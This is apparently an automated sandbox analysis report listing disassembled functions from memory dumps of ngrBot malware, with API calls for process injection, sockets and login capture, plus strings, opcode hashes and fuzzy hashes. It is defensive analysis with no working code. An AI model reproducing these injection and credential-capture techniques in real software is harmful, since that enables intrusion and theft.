                                                                  • Instruction Fuzzy Hash: AB31D776900204BBCB13DFA5EC86EAF77ACEB85350F158025F9089B205DB75ED50CBA1
                                                                  Function 00402F90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32 ref: 00402FD2
                                                                  • WriteProcessMemory.KERNEL32 ref: 0040301C
                                                                  • WriteProcessMemory.KERNEL32 ref: 00403036
                                                                  • WriteProcessMemory.KERNEL32 ref: 00403053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID: $g\@
                                                                  • API String ID: 2454571318-100232733
                                                                  • Opcode ID: afba040f6b78dad9a64a69251b00c2452e7616e1452184dac7652ca053b11117
                                                                  • Instruction ID: df94579fe5779622c4b9a2bbeb87517a31d4cf809518c5bbba1c78cdbb14ede0
                                                                  • Opcode Fuzzy Hash: afba040f6b78dad9a64a69251b00c2452e7616e1452184dac7652ca053b11117
                                                                  • Instruction Fuzzy Hash: D2318DB2A0150DAADB10DE99DC80EEFB77CEB40751F10412AEA04E6288E775AF45C7A4
                                                                  Function 00362F90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32 ref: 00362FD2
                                                                  • WriteProcessMemory.KERNEL32 ref: 0036301C
                                                                  • WriteProcessMemory.KERNEL32 ref: 00363036
                                                                  • WriteProcessMemory.KERNEL32 ref: 00363053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID: $g\6
                                                                  • API String ID: 2454571318-3164584468
                                                                  • Opcode ID: fbc36e80b39263f23166b25f1eac621fefa91bc6881c44d4a3bae4a84a3715ab
                                                                  • Instruction ID: 84734083bfb273db3e7a8ac7c4cab37bed24fa0fdcfca4f0956b73c29d8026c3
                                                                  • Opcode Fuzzy Hash: fbc36e80b39263f23166b25f1eac621fefa91bc6881c44d4a3bae4a84a3715ab
                                                                  • Instruction Fuzzy Hash: BA316DB260050DAADB12DE99DC80EEFB37CEB41750F118165F90696148E771AF59C7A0
                                                                  Function 0040D110 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: 9443ea1a6c34d4dd27128972ab46630562f1943a0569a7d966f0aeca5586478e
                                                                  • Instruction ID: e19f26a57a8d371ee74b48060b1fbe9b9ea883c41348451d97a1bc845706ce98
                                                                  • Opcode Fuzzy Hash: 9443ea1a6c34d4dd27128972ab46630562f1943a0569a7d966f0aeca5586478e
                                                                  • Instruction Fuzzy Hash: 57310475900206BBE7209B69CC89FA77B6CEF44344F044179B909A7282EA74ED45C7B4
                                                                  Function 0036D110 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: 5f2657c2eebf678fad5feb3b2ec57f8f0d5dcc65ead0421a3bf29b19ca24837d
                                                                  • Instruction ID: 81572c47e5d9c0ca1cd067c298147256335ca1e14ed6469cb3339240b821c915
                                                                  • Opcode Fuzzy Hash: 5f2657c2eebf678fad5feb3b2ec57f8f0d5dcc65ead0421a3bf29b19ca24837d
                                                                  • Instruction Fuzzy Hash: FE3108B5A00206BBE7219B28CCC9FA7776CEF44340F048164F8099B146E770ED45CBB0
                                                                  Function 00407610 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 87stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: 23ec7fce3546beb37acd49c2d85190782378fbd514bc716e8a0b894e0436e7ca
                                                                  • Instruction ID: 788de98c1237337ff7e2880e90b2af97be5818e55d19a1934294188661e30183
                                                                  • Opcode Fuzzy Hash: 23ec7fce3546beb37acd49c2d85190782378fbd514bc716e8a0b894e0436e7ca
                                                                  • Instruction Fuzzy Hash: 08212B72B002186BD7209F69ECC5FE77358EB44714F04497AFD19E3241E675D94087E5
                                                                  Function 00367610 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 87stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: 7780d8fd73e9fa098c450c1724e9cc2d417a221c408d73ef63077e79ae802981
                                                                  • Instruction ID: aa1474777e4f76f2a505ad83bf3dbf6cf5e348f58b39094bb370b8cdb8132549
                                                                  • Opcode Fuzzy Hash: 7780d8fd73e9fa098c450c1724e9cc2d417a221c408d73ef63077e79ae802981
                                                                  • Instruction Fuzzy Hash: 82210333600218ABEB329E6CEC84FE7736CEB44714F848569FD1CD7105E670990087E0
                                                                  Function 0036F2B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00363810: GetProcessHeap.KERNEL32(00000000,00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363819
                                                                    • Part of subcall function 00363810: HeapAlloc.KERNEL32(00000000,?,00364046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00363820
                                                                  • sprintf.MSVCRT ref: 0036F2E9
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 0036F2FA
                                                                  • memset.MSVCRT ref: 0036F323
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,003709A7,0000000C,?,00000400,00000000,00000000), ref: 0036F352
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036F35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 2995886503-1260769427
                                                                  • Opcode ID: 5325013f763f17556db8bd5bc0ac033215bf5d12ea737fe2390fd52abcbe3d61
                                                                  • Instruction ID: bfaebc873294c7f5f93ad6f6afdcf5390d71df61640c89358df370111cfb1208
                                                                  • Opcode Fuzzy Hash: 5325013f763f17556db8bd5bc0ac033215bf5d12ea737fe2390fd52abcbe3d61
                                                                  • Instruction Fuzzy Hash: D02195F19002087FE721DF989CC5EFEB77CEB45754F104579F608A6281E6B40F844AA1
                                                                  Function 004081C0 Relevance: 10.6, APIs: 7, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004081E3
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004081F9
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040820F
                                                                  • closesocket.WS2_32(00000000), ref: 0040821A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Startupclosesocketioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3235567692-0
                                                                  • Opcode ID: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction ID: 2b0dcf704551c650d29533d06b19cfcaca382403250199c2a733ecaf4d854171
                                                                  • Opcode Fuzzy Hash: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction Fuzzy Hash: 0301D67164031875EA20E6A59D07FFE725CCF05728F0006AAFB18BA1C1EBF95AD542DD
                                                                  Function 003681C0 Relevance: 10.6, APIs: 7, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 003681E3
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003681F9
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0036820F
                                                                  • closesocket.WS2_32(00000000), ref: 0036821A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Startupclosesocketioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3235567692-0
                                                                  • Opcode ID: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction ID: 16254396924809651beff1ea8a6a145b19e0e2e1edd266c2eefe6412e20f4643
                                                                  • Opcode Fuzzy Hash: 99a00781a98e2d090824e08d9e6a8e1d87241bac9156ba88cfc4ef0652faaba6
                                                                  • Instruction Fuzzy Hash: CD012231640A18B5EA32E6A48C03FFE725CCF09720F008BA4FB1CAE4C1EBF54A048395
                                                                  Function 0040A64A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 18synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040E750,00000000,00000000,00000000), ref: 0040A659
                                                                  • MessageBoxA.USER32 ref: 0040A66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A678
                                                                  • ExitProcess.KERNEL32 ref: 0040A680
                                                                  Strings
                                                                  • ngrBot Error, xrefs: 0040A661
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 0040A666
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: ef5e2cb8f22fc0210164a191ddb43d318e3842e5a1d98e74102cfaaa7881f373
                                                                  • Instruction ID: dc0d325c1072b72e0d8e59aa08d1cae9c16ec156ffef70dd10597c0366fd65a5
                                                                  • Opcode Fuzzy Hash: ef5e2cb8f22fc0210164a191ddb43d318e3842e5a1d98e74102cfaaa7881f373
                                                                  • Instruction Fuzzy Hash: 22E06735BC5351B7E62017A05D0BFC429249B08F52F218661B315FE4E0C6E42190475D
                                                                  Function 0036A64A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 18synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036E750,00000000,00000000,00000000), ref: 0036A659
                                                                  • MessageBoxA.USER32 ref: 0036A66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036A678
                                                                  • ExitProcess.KERNEL32 ref: 0036A680
                                                                  Strings
                                                                  • ngrBot Error, xrefs: 0036A661
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 0036A666
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: 319ebe08d38caa3c9c798332a554056912fb04d0de90b7bdefe213ae71aa081d
                                                                  • Instruction ID: 63999540bd792ed753e1420c3cb228ac651cae3c2a7ec816526a9610de55d4c6
                                                                  • Opcode Fuzzy Hash: 319ebe08d38caa3c9c798332a554056912fb04d0de90b7bdefe213ae71aa081d
                                                                  • Instruction Fuzzy Hash: C5E09E367D4351B7E67317A45D0FFC536589B04F12F214600F32DBD0D49AD421C04759
                                                                  Function 00407330 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 60stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: 7dd372d5851a64b1621396c9dfdd56531f0907fab683194608e6fb6fd50729dd
                                                                  • Instruction ID: 5826c9583f370a1dd932e8f72a1f935f9ca8b57465acbcc929005ef802fb48eb
                                                                  • Opcode Fuzzy Hash: 7dd372d5851a64b1621396c9dfdd56531f0907fab683194608e6fb6fd50729dd
                                                                  • Instruction Fuzzy Hash: 3B114CB2A4031937F720E6698C86FF7736CDF84700F0405BDBE1853182E5B49E4087A4
                                                                  Function 00367330 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 60stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: bcf893b7db30a069d51f0e2843565e782ef5ea78ce021f5905103030c7406fc5
                                                                  • Instruction ID: b96222c4dd8e47ac36bac6709cde971cd6a4a41b79cfb9425b0dadd1a0c0cac7
                                                                  • Opcode Fuzzy Hash: bcf893b7db30a069d51f0e2843565e782ef5ea78ce021f5905103030c7406fc5
                                                                  • Instruction Fuzzy Hash: DB112F7694031977E731E6589C86FF7736CDF84750F0445A8F91C6B281E5B49E0087E0
                                                                  Function 004102A9 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 57memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 004102C8
                                                                  • strstr.MSVCRT ref: 004102EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00410322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103EE
                                                                  • LeaveCriticalSection.KERNEL32(0044B4E4), ref: 004103FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: ee71abe191ac5c5f67e6a76e53e66d7266845c4f9d38bb18f3292e0e6c04068d
                                                                  • Instruction ID: 18d3edc493bc3f403bf92720d977da1dbff54a17adae19d127435001e8f83a82
                                                                  • Opcode Fuzzy Hash: ee71abe191ac5c5f67e6a76e53e66d7266845c4f9d38bb18f3292e0e6c04068d
                                                                  • Instruction Fuzzy Hash: CC11A971A4031DABDB209751CC81BFBB378EB84305F14416BEE1963240DAB8FDC18BA9
                                                                  Function 003702A9 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 57memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003702C8
                                                                  • strstr.MSVCRT ref: 003702EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00370322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703EE
                                                                  • LeaveCriticalSection.KERNEL32(003AB4E4), ref: 003703FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: fc0c17e4cbced1a9d059582ba3d907fd934f31465bfa82913651592296cd72fb
                                                                  • Instruction ID: df359d3c6ccf50b77b921fd9942466837951e6e208e81b0e8083957c29fa71f7
                                                                  • Opcode Fuzzy Hash: fc0c17e4cbced1a9d059582ba3d907fd934f31465bfa82913651592296cd72fb
                                                                  • Instruction Fuzzy Hash: 9A11E976A40609EBEB368751CC81FBAB378EB84310F148469FA1D67140DB78BD418F90
                                                                  Function 0040DD20 Relevance: 9.0, APIs: 6, Instructions: 36sleepthreadnetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: 45cafbe1ea53cd53aec28c77d21da2276e5172413c87d9c6706ecdba95742d04
                                                                  • Instruction ID: 7f0fa1591e1ee0be880222c6a73bc66ebc889f5a3643ae2c22fe3d04a35b960a
                                                                  • Opcode Fuzzy Hash: 45cafbe1ea53cd53aec28c77d21da2276e5172413c87d9c6706ecdba95742d04
                                                                  • Instruction Fuzzy Hash: 81F090B1D4061466D7203BF97D096AE36545F14329B204A37FB15E22F0EB3C89458AAE
                                                                  Function 0036DD20 Relevance: 9.0, APIs: 6, Instructions: 36sleepthreadnetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: deef3c340394b5666e779a3e9e7f720e5270d1d8cce06f407227b413134fdd78
                                                                  • Instruction ID: dddf8594d11a6f97f2b073f21ee2d1a9fe44775c8454e94e1be6d03f8b306aa9
                                                                  • Opcode Fuzzy Hash: deef3c340394b5666e779a3e9e7f720e5270d1d8cce06f407227b413134fdd78
                                                                  • Instruction Fuzzy Hash: 03F0BB72F00A1456C6333BBD7D0E56D32585F12364F158611F719C69F8EB3485C089A2
                                                                  Function 00364560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT ref: 003645D5
                                                                  • CreateFileMappingA.KERNEL32 ref: 003645FD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 00364636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280
                                                                  • Opcode ID: 655d39e16036209100fdf60239a7479dfcaab393c8c4ab7aaf9c1f64f500b9d7
                                                                  • Instruction ID: 9cf9399482b06dbd1cc9f88a778be39e2a718cb70cb8b37003d6ba17ee2f108d
                                                                  • Opcode Fuzzy Hash: 655d39e16036209100fdf60239a7479dfcaab393c8c4ab7aaf9c1f64f500b9d7
                                                                  • Instruction Fuzzy Hash: DB61E3726106028FD326CF18C885BB5B7E5FF84304F28817DE6868B385D779A9A4DB80
                                                                  Function 0040E4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79sleepmemorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • lstrlenA.KERNEL32(?), ref: 0040E517
                                                                  • _memicmp.MSVCRT ref: 0040E525
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040E54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E57A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
                                                                  • Opcode ID: dbf4343face418a870bb8425e8e66a13a343c3042656d238115fe0c3f70b93bf
                                                                  • Instruction ID: 783aa63cf0ce7d9ff363f5601bd85304eb0c082eb699b2ee8fe1f1afe810e237
                                                                  • Opcode Fuzzy Hash: dbf4343face418a870bb8425e8e66a13a343c3042656d238115fe0c3f70b93bf
                                                                  • Instruction Fuzzy Hash: EC21DAB1640204BBD720DB96DD81FAB77ACDB84745F10483AF904533C1E7BD9D61C6A9
                                                                  Function 0036E4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79sleepmemorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • lstrlenA.KERNEL32(?), ref: 0036E517
                                                                  • _memicmp.MSVCRT ref: 0036E525
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036E54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E57A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
                                                                  • Opcode ID: 33f3136c634fc41f62c91a9feff0bbc602e049353e4031ba6289e58ea1357173
                                                                  • Instruction ID: cfe6a38307e7c6637bec1a40e321d5810d88761d796b4440ef52b71919815c8e
                                                                  • Opcode Fuzzy Hash: 33f3136c634fc41f62c91a9feff0bbc602e049353e4031ba6289e58ea1357173
                                                                  • Instruction Fuzzy Hash: 132108B6500204ABD732DB58DC86FAB73ACEB45714F15C418FA094B245F7B5ED44CBA1
                                                                  Function 00401C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 00401C6E
                                                                    • Part of subcall function 00403750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0040376B
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00401CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00401CD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$AddressCloseFileModuleProcedureWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2185083974-2113957990
                                                                  • Opcode ID: 8a3a0deed9bbcea85a1b6a89db91e2350229aa1256e8c9d6a1a26e2b90d2296e
                                                                  • Instruction ID: 3516dd70821b321a82e3fccae0f5f19e3dd812fe4f74b4804ac45d1edfcd853e
                                                                  • Opcode Fuzzy Hash: 8a3a0deed9bbcea85a1b6a89db91e2350229aa1256e8c9d6a1a26e2b90d2296e
                                                                  • Instruction Fuzzy Hash: FA012BB16441187FE7049F68DC85FEB735DAB49714F148239FA15A32E0D2B49D0553A8
                                                                  Function 00361C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW), ref: 00361C6E
                                                                    • Part of subcall function 00363750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0036376B
                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00361CC6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00361CD9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$AddressCloseFileModuleProcedureWrite
                                                                  • String ID: CreateFileW$kernel32.dll
                                                                  • API String ID: 2185083974-2113957990
                                                                  • Opcode ID: 5175f491e86878ffe8f25cd02e848e932733e971e38d4c411600235d3f5db5a9
                                                                  • Instruction ID: 53f175d369ab480de3b7e4148c3814d9c3c7c1a90066783c2173fe9070ab0dd5
                                                                  • Opcode Fuzzy Hash: 5175f491e86878ffe8f25cd02e848e932733e971e38d4c411600235d3f5db5a9
                                                                  • Instruction Fuzzy Hash: 680108B2A402147FD7159E6D9C8AFEF335D9B45324F15C218F919972C0D6705D4483A0
                                                                  Function 00406D90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
